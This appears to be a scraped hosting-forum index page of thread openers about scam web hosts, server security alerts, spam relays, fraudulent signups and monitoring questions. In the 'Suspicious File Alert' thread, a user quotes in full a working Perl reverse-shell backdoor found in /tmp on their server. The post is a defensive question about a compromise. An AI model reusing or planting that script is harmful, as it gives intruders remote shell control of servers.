SCAM Alert : Hajto.com.pl
Apr 16, 2009has anyone purchased a server from the op and received it yet?
View 14 Replies
ADVERTISEMENT
Hajto - Any Reviews/Experiences
Apr 1, 2009I have searched the forum and I cannot find any posts about Hajto Unmetered Solutions. Was wondering if anyone has had any experience/reviews of them.
View 10 Replies View RelatedSSH Alert
Feb 8, 2008I dont know if this has been asked before. Anyway what I want to accomplish is I want an email be sent to my email address everytime someone connects to my SSH. I want an email sent regardless it was a successful or failed login. Is there a step by step tutorial for this.
View 5 Replies View RelatedLSM Alert
Mar 3, 2008I just received this alert, can anyone tell me what that means?
I did not install anything...
> tcp 0 0 IP:19848 0.0.0.0:* LISTEN -
> tcp 0 0 IP:19900 0.0.0.0:* LISTEN -
> tcp 0 0 IP:22812 0.0.0.0:* LISTEN -
> tcp 0 0 IP:24924 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27411 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27542 0.0.0.0:* LISTEN -
> tcp 0 0 IP:29077 0.0.0.0:* LISTEN -
> tcp 0 0 IP:32895 0.0.0.0:* LISTEN -
> tcp 0 0 IP:36635 0.0.0.0:* LISTEN -
> tcp 0 0 IP:46277 0.0.0.0:* LISTEN -
> tcp 0 0 IP:47068 0.0.0.0:* LISTEN -
> tcp 0 0 IP:51199 0.0.0.0:* LISTEN -
> tcp 0 0 IP:52752 0.0.0.0:* LISTEN -
> tcp 0 0 IP:56869 0.0.0.0:* LISTEN -
Alert Notification In Lfd
Apr 30, 2008I installed csf: v3.28 on my server .
Where is this email configurable? I have seen this email alert notification in the logs numerous times but have yet to receive any alert emails from CSF/LFD.
Relay Alert
Jun 5, 2008i have this notification that keeps coming from the same ip at least 10 or 20 times a day since 3 days aprox. dunno what it is...
this is the message:
Quote:
subject: lfd on nameserver.domain: RELAY Alert for 200.27.xxx.xxx (domain.cl)
body:
Time: Thu Jun 5 10:56:19 2008
Type: RELAY, Remote IP - 200.27.xxx.xxx (domain.cl)
Count: 101 emails relayed
Blocked: No
Sample of the first 10 emails:
2008-06-05 10:19:56 1K4GJo-00040m-Rf <= 3eseofertas@gmail.com H=(mail.gmail.com) [200.27.xxx.xxx] P=esmtp S=1738 id=20080605102044.5323CE2BEB4A1707@gmail.com T="Especial Empresas STGO - CCTV -Evaluacion en Terreno sin Costo."
it looks like spam... is my server sending spam or im receiving it?
Downtime Alert
Jul 13, 2007I have many domains and webservers. so it's hard to monitor everything usually. i heard there are some websites and softwares to do this.
does windows 2003 have anything default like this ? or can anyone suggest the application for my windows 2003 server? which sends alerts if any error is going on my server?
Also there any other websites which is doing this monitoring? because i have some shared accounts and i want to monitor it too.
VPS QoS Alert - Memory
May 30, 2007please check the following screnshot
[url]
this is way better, my server goes up for 10-20 minutes then I have to hit restart from the virtouzzo, becuase the server simply goes dead. nothing loads..
how can I know which site on my vps is causing trouble and how to fix it?
LSM Alert On Server
Feb 13, 2007I am getting on every 10 minutes mails like that from my server every one has different ports
Quote:
This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 ************:3262 0.0.0.0:* LISTEN
Quote:
This is an automated alert generated from *************. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 *************:53007 0.0.0.0:* LISTEN -
Quote:
This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 ***********:44543 0.0.0.0:* LISTEN
How can i find why this is coming? My managment company said me that a script is tryig to open a socket but we couldnt find the script. Is there any people here have like a similar issue or how can i find and solve this?
Alert For Fella Hosts
Apr 10, 2008In less than 5 mins of account activation user named Paul McGrath, supposedly from NY. Allegedly using lolchurch.com domain (that domain was never forwarded to our server) and user just put a script called send.php and let it rip.
Good thing i was around and management looked at it within minutes (AcuNett).
So, watch for this user signing up and check account(if using that user name or similar domain or recent signups) for any such php page.
Now asks us for refund for suspending his site for spamming.. Asked for his driver license copy to first verify his address, so possibly i can report to paypal for possible fraud too or some online internet police maybe for fraud if there is such a police
Note to Mods. not sure where threads like these go to!
Quick edit: Now user trying to threaten us to give their refund cause they want it back for they spammed and deserve a refund for the same.
"Your servers were awful anyways, I maybe sent 500 emails? I'm gonna ask nicely before I actually do something about this, give me a refund."
he forgot 500 emails in less than 5 mins. does not look like not-spam. Anyways i go have some chat with the fraud, id does not match paypal payment id
Error :: Alert: No_kernel_support_for_openvz_check_if_right_kernel...
Mar 25, 2009why its doing this when i try create a vps?
Quote:
Alert: no_kernel_support_for_openvz_check_if_right_kernel...
Quote:
[root@box ~]# cat /etc/grub.conf
# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You have a /boot partition. This means that
# all kernel and initrd paths are relative to /boot/, eg.
# root (hd0,0)
# kernel /vmlinuz-version ro root=/dev/sda5
# initrd /initrd-version.img
#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title CentOS (2.6.18-92.1.22.el5)
root (hd0,0)
kernel /vmlinuz-2.6.18-92.1.22.el5 ro root=LABEL=/
initrd /initrd-2.6.18-92.1.22.el5.img
[root@box ~]#
Quote:
[root@box ~]# rpm -qa | grep kernel
kernel-2.6.18-92.el5
kernel-devel-2.6.18-92.el5
kernel-2.6.24.5grsechostnoc4.0.0x86_64libata-1
kernel-headers-2.6.18-92.1.22.el5
kernel-devel-2.6.18-92.1.22.el5
kernel-2.6.18-92.1.22.el5
[root@box ~]#
Have tried running:
yum -y install ovzkernel.x86_64
Quote:
Installing: ovzkernel ######################### [1/1]
Error unpacking rpm package ovzkernel - 2.6.18-92.1.18.el5.028stab060.2.x86_64
error: unpacking of archive failed on file /lib/modules/2.6.18-92.1.18.el5.028stab060.2/kernel/arch/x86_64/crypto/aes-x86_64.ko;49c8f08e: cpio: write
Installed: ovzkernel.x86_64 0:2.6.18-92.1.18.el5.028stab060.2
Complete!
Fraud Account Alert
Jul 3, 2008I've gotten two fraudulent signups from the following ip address:
206.53.49.**
Luckily, maxmind has caught him both times, but he's using an address from canada and the phone is fake but the domains he's using are real.
I've gone ahead and blocked the ips, but I just wanted to let you guys know.
Email Phishing Alert
Apr 26, 2008Gmail has a feature to detect email phishing and it marks them with a red header alert saying "Warning" This message may not be from whom......", I believe this red alert has nothing to do with spf record of that email, so how does it detect it as phishing email?
We have spf record and I sent an email from another server, when I received that emai the spf record was "softfail" but it does not have that red alert.
Lfd: Suspicious File Alert
Mar 24, 2008I got this system email:
Time: Sun Mar 23 23:09:01 2008
File: /tmp/back
Reason: Script, starts with #!
Owner: nobody:nobody
Action: No action taken
So I looked and the file says this:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!
");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!
");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!
");
connect(SOCKET, $paddr) || die("Error: $!
");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
That one line 'echo "`uname -a`";echo "`id`";/bin/sh';
Shell Script Alert
Jun 7, 2007how i can secure vps from this kind of script and known when someone upload shell script. How do I set the alert so I get to know that someone has uploaded a script on the server
View 3 Replies View RelatedAlert: Open DNS Server
Apr 16, 2007I've run "DNS report" test for one hosting in dnsstuff.com and got this warning (as some times before for other hosts:
---------------------
Fail:
Open DNS server
ERROR: One or more of your nameservers reports that it is an open DNS server. This usually means that anyone in the world can query it for domains it is not authoritative for (it is possible that the DNS server advertises that it does recursive lookups when it does not, but that shouldn't happen). This can cause an excessive load on your DNS server. Also, it is strongly discouraged to have a DNS server be both authoritative for your domain and be recursive (even if it is not open), due to the potential for cache poisoning (with no recursion, there is no cache, and it is impossible to poison it). Also, the bad guys could use your DNS server as part of an attack, by forging their IP address.
-----------------------
Is this anythhing important?
DO NOT USE Lunarpages (scam)
Aug 2, 2008Lunar pages is a scam
DO NOT USE Lunarpages
From Me to Support I noticed that my inodes are set abnormally low to 200,000 we just upgraded to VPS plan per lunars request at we are at 160,000 on second day of operation on new vps server. From Sarwan singh Jassi to siteadmin(ME) When you reach 200,000 inodes you will need to upgrade to dedicated plan However and Email from the sales guy states the following. We do not force upgrades do to inodes, we just increase your inodes as you need them. Server crashes occur all the time about 1-3 times a month. Do not use lunar
They also run the old 90's upgrade scam, they claim your script utilize high resources for php, mysql.
Their claim
CPU%: 3.15
MEM%: 1.70
MySQL: 0.9
Top Process %CPU 50.0 /usr/bin/php
Top Process %CPU 48.0 /usr/bin/php
Top Process %CPU 44.0 /usr/bin/php
After fighting with these people telling them that their server is configured incorrectly because we have load tested each and every script and that these scripts are used on 1000's of sites and the traffic we have does NOT warrent the useage they claim we went a head and upgraded per their recommendation.
So we get a brand new vps plan(see complaint above) and on the VPS server our usages look totally normal with proves they don't know what they are doing.
Directly from Pesky Plesk on the second day of getting our upgrade
CPU%: 0.15
MEM%: 0.19
MySQL: 0.2
Top Process %CPU 17.0 /usr/bin/php
Top Process %CPU 19.0 /usr/bin/php
Top Process %CPU 15.0 /usr/bin/php
Bluehost Scam
Oct 18, 2006They are scammer, we sign up with them and they ask us to submit credit card detail which we do.
Guess what , they use our credit card to purchase server for their own use, we contact them and they ask us to charge back if we wish, I think as they are now no longer need for the server
They are a scammer Scammer and poor DC will suffer a lost becasue I will chargeback all the charges for the server
May I Know is there any way to report this company (I am not in US) cause they must be punish for this issue
SolarVPS = Scam
Aug 14, 2007I'll tell you my story right now. I got the VPS and they charged me $60. The page didn't even look like a paypal page and I didn't know when I went through the order process that I have been charged. They accepted my payment even though they had the radio button that said first month a dollar. They even didn't have cpanel installed at first! They gave me the email and I had to contact them to install cpanel! They have this stupid contrat thing and they will take you to a collection agency for failure of the billing system that they have. It says DO NOT MAKE PAYMENT! but how can you tell? They are a complete total scam! The vps firewall was dropped for no reason during the morning. I asked why and they left the chat. They have good VPS if you got the extra $59 to cover the beginning.
View 14 Replies View RelatedEuroVPS SCAM
Apr 16, 2009EuroVPS company received the payment for VPS server and does not give me the settings finding different reasons for that and does not want to refund my money.
ORDER #EV20380S
Date 28-Mar-2009
That was 11 April when I last received e-mail from them saying that Accounts department would consider possibility of refunding the money to my paypal account.
JUMPLAUNCH.COM SCAM
Apr 20, 2009Buy a few days ago the first package in jumplaunch.com.
The charge was for $ 75 but I think I charged $ 110. I went to the bank but the transaction does not appear.I have only 110 dollars less.
jumplaunch is fraud?....
BoxVPS Is A Scam
Oct 4, 2009I saw an offer from BoxVPS that was too good to be true. And in fact it was. It's been nearly a month since I paid for a VPS and still no service. My client login is disabled and they won't respond to requests for service or for a refund.
Simply stated - BoxVPS is a scam. Do not succumb to their offers, no matter how attractive they might seem. This is apparently just another in a long line of scams appearing with startling frequency on WHT. This phenomenom makes it difficult to give new hosts a try.
Server4you.de Is A Scam
Mar 7, 2008I am a very diplomatic person and I believe in doing fair business. This is why I've decided to write this post in your forums as well as my own and a few others. I want to share with the world our horrible experience with Server4you.de in hopes of saving the rest of you from their lies.
I am not one to openly bash people online but I feel the need to spare all of you from falling victim to this company!
In order to offer the most stable listening experience to all of you, we needed to add another European server. Doing a little research in Google, we fell on Server4you.de (a German company).
Here is an example of what they promote (in German):
AMD Athlon 64 X2 3400+,
DualCore 64 Bit,
1.024 MB DDR2-RAM
1x 160 GB SATA-HDD
Betriebssystem: OpenSuSE,
Fedora, Ubuntu und Debian
Plesk 8.2 - 10 Domains
Unbegrenzter Datentransfer (which means unlimited datatransfer)
Kostenloser Support per
E-Mail und 0800-Hotline
Before hand, we verified with them that the unlimited datatransfer package was accessible for streaming. Most companies don't allow this so it is always the first question to ask. They confirmed that there was no problem at all!
Well, after 2 months of service with them, they are telling us that we must limit our datatransfer to 75GB/day or 2TB/month. You might think that this is already a lot but this is standard for most dedicated servers and this suddenly makes them pretty expensive (even for North-American standards). Note that European bandwidth is known to be significantly cheaper than North-American bandwidth.
This was one of the few times I've had to sign a contract for hosting. So for the next year, I'm stuck paying for cheap/mediocre quality bandwidth that's suddenly not even unmetered anymore! I would walk away from them if I could (contract or no contract, I don't care) but since we're outside Germany, they made us pay for 12 month in advance. So if I want to get anything out of that money, I have no choice to use their low grade bandwidth.
Basically, consider yourself warned! Don't do business with Server4you!
They actually disconnected our servers without warning or even messaging us because we had apparently reached this new bandwidth quota which had never been mentioned in the past!
ADDR.COM SCAM
Dec 21, 2008Yesterday I got a call from addr.com (caller id read AFTERGEN INC. tel: 409-938-0691)
The man with the Indian accent of some advised me that my webhosting has been active since 2001 and he said I owe them $750 or so. I told him I haven't hosted with them since 2001. He advised me that they the hosting account has been active since then.
So I tell him that you waited 8 years to call me? He said well "we couldn't get in touch with you at your hotmail account". Yea but still 8 years to call me? He tells me that I didn't cancel hosting with them.
I know for a fact that as soon as you don't renew hosting with addr.com or any other webhosting service, they will give 1 or 2 weeks to pay or they will delete your account. Then I said I won't pay them a dime! He tells me that he can give me a discount. Can you believe this scam? I hang up the phone on them.
SO NOW I OWE $750 to addr.com for past fees and they are claiming that I never cancelled hosting with them and I didn't notify them.
Best Way To Tell A Scam Web Host
Oct 11, 2008Before I got into web hosting business, I too, searched the whole World Wide Globe for a good web hosting company. And like many fall for some scams and learned from my experiences. Here are some ways you can tell a web host that is not safe.
Sign-up Page isn't secure.
Request a server IP to ping. This way you can figure out if the company is on a VPS, Reseller or a computer in someone's apartment [Reverse IP Check]
Unlimited Everything (well back in the day it was part of it until Yahoo decided to go solo) Company website itself goes down.
Can't find any of their representatives online (e.g. forums, blogs).
Doesn't have a Phone Number to reach.
Private Domain Registration (would you really send your money to a unknown company's PO.BOX address?)
Lies to you (e.g. Gives you 1 TB Bandwidth, but if you use up 50 GB and they close your account)
Asks for SSN/EIN for security purposes (hmm... complete B.S)
Doesn't tell you exactly how they protect your data, how secure the server is and so on.
Asks for your PayPal Username & Password on their website (also known as phishing)
Do a WHOIS Search and check how long they have been on business. (added by maccrazy)
Those are just some of things I found in a scam web host. I am sure there are many, please feel free to share your story and precautions you take.
Webhostingpad Is A Scam
Jul 3, 2008webhostingpad has terrible service and disconnnects its phones when it has technical issues. Dozens of people have been victimized by this company and lost business thanks to their incompentence. They give all web hosts a bad name--please get the word out!
View 14 Replies View RelatedSmokyHosts A Scam
Aug 11, 2008For the past 7 months i have a vps.
The first months i had 380mb as i thought that would be enough.
After alot of privvm going sky high and a lack of support i decided to upgrade the ram to 640.
However it is still slow. They say they give 24/7 support but you can wait day's for them to report back.
This is what i get with top if i have disabled almost every service.:
Is this normal?
top - 13:34:06 up 57 min, 1 user, load average: 0.03, 0.03, 0.16
Tasks: 26 total, 1 running, 25 sleeping, 0 stopped, 0 zombie
Cpu(s): 0.0% us, 0.2% sy, 0.0% ni, 99.8% id, 0.0% wa, 0.0% hi, 0.0% si
Mem: 2062764k total, 2045320k used, 17444k free, 59740k buffers
Swap: 4192956k total, 150964k used, 4041992k free, 1071364k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 16 0 1628 596 516 S 0 0.0 0:00.09 init
20246 root 15 0 1456 392 336 S 0 0.0 0:00.00 courierlogger
20248 root 16 0 1804 608 500 S 0 0.0 0:00.00 authdaemond
20259 root 16 0 4016 1128 832 S 0 0.1 0:00.11 sshd
20268 root 16 0 1804 248 140 S 0 0.0 0:00.00 authdaemond
20269 root 16 0 1804 248 140 S 0 0.0 0:00.00 authdaemond
20324 root 16 0 7448 2752 1136 S 0 0.1 0:00.02 chkservd
20336 root 18 0 1460 304 252 S 0 0.0 0:00.00 courierlogger
20337 root 18 0 1568 488 412 S 0 0.0 0:00.00 couriertcpd
20343 root 22 0 1460 304 252 S 0 0.0 0:00.00 courierlogger
20344 root 18 0 1568 488 412 S 0 0.0 0:00.00 couriertcpd
20349 root 18 0 1460 304 252 S 0 0.0 0:00.00 courierlogger
20350 root 18 0 1568 488 412 S 0 0.0 0:00.00 couriertcpd
20356 root 20 0 1460 304 252 S 0 0.0 0:00.00 courierlogger
20357 root 18 0 1568 488 412 S 0 0.0 0:00.00 couriertcpd
21648 root 16 0 7168 1376 1064 S 0 0.1 0:00.05 pure-ftpd
21651 root 15 0 6704 992 796 S 0 0.0 0:00.00 pure-authd
21925 root 18 0 12324 6784 476 S 0 0.3 0:00.00 cpdavd
21952 root 35 19 9488 5836 1548 S 0 0.3 0:00.22 cpanellogd
21988 root 18 0 4052 804 576 S 0 0.0 0:00.00 saslauthd
22020 root 18 0 1488 396 324 S 0 0.0 0:00.00 portsentry
22168 root 16 0 16424 7476 912 S 0 0.4 0:00.01 cpsrvd-ssl
3626 root 16 0 7056 2288 1840 S 0 0.1 0:00.13 sshd
3695 root 16 0 5436 1468 1192 S 0 0.1 0:00.07 bash
29799 root 16 0 1456 284 212 S 0 0.0 0:00.18 minilogd
8103 root 16 0 1888 952 776 R 0 0.0 0:00.15 top
Tagbridge Is A SCAM
Jun 19, 2008TagBridge is by far the worst company to get involved with. I purchased a VPS and they said in a support ticket 5 hours after I bought it that it will be setup in a few minutes. 24 hours later I cancel and request a refund and I went with veritynet.. 12 hours later my VPS was made and I still have a cancellation request in place which they ignored. It has been a week now and I'm still attempting to get a refund. Jamie blocked me on MSN to avoid my conversation. I talked to a friend of his and everytime has asks Jamie for a refund jamie doesn't respond. HORRIBLE SUPPORT. Now I have a VPS I have no use for, that of which I canceled 12+ hours before it was even MADE and they refuse to message me back regarding my refund.
This will be posted EVERYWHERE till I get my refund. This business is a scam and I don't want to be involved with it anymore.
Strange Error : Alert: File_exists_not_owned
Jun 9, 2009strange error : Alert: file_exists_not_owned
file_exists_not_owned [/home/admin/lc//index.html]
this error gets displayed, when trying to edit any file (suitable filename ) via Kloxo
I checked the chmod permission it was 755, still I was unable to edit file via Kloxo
any suggestions on why this problem and how to overcome this?
Software To Alert Me Using Sms Or Email When Server Is Down
Mar 28, 2009Is there any software to alert me using sms and email when my server is down?
I know a few good online solutions but i want to test also a solution from my pc.
E-mail Alert On Root SSH Login
Jun 3, 2009Want to be notified instantly when someone logs into my server as root With date time & local IP address
View 12 Replies View Related